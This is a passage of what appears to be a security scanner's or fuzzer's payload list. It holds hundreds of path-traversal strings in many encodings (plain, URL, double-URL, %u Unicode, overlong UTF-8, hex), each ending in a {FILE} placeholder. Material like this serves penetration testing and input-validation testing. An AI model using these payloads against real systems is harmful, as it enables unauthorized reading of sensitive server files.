"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,\\../{FILE}", + "true,\\../\\../{FILE}", + "true,\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,/..\\{FILE}", + "true,/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,.../{FILE}", + "true,.../.../{FILE}", + "true,.../.../.../{FILE}", + "true,.../.../.../.../{FILE}", + "true,.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../.../{FILE}", + "true,...\\{FILE}", + "true,...\\...\\{FILE}", + "true,...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,..../{FILE}", + "true,..../..../{FILE}", + "true,..../..../..../{FILE}", + "true,..../..../..../..../{FILE}", + "true,..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../..../{FILE}", + "true,....\\{FILE}", + "true,....\\....\\{FILE}", + "true,....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,........................................................................../{FILE}", + "true,........................................................................../../{FILE}", + "true,........................................................................../../../{FILE}", + "true,........................................................................../../../../{FILE}", + "true,........................................................................../../../../../{FILE}", + "true,........................................................................../../../../../../{FILE}", + "true,........................................................................../../../../../../../{FILE}", + "true,........................................................................../../../../../../../../{FILE}", + "true,..........................................................................\\{FILE}", + "true,..........................................................................\\..\\{FILE}", + "true,..........................................................................\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%u2215{FILE}", + "true,..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,..%u2216{FILE}", + "true,..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uF025{FILE}", + "true,..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,..0x2f{FILE}", + "true,..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,..0x5c{FILE}", + "true,..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + 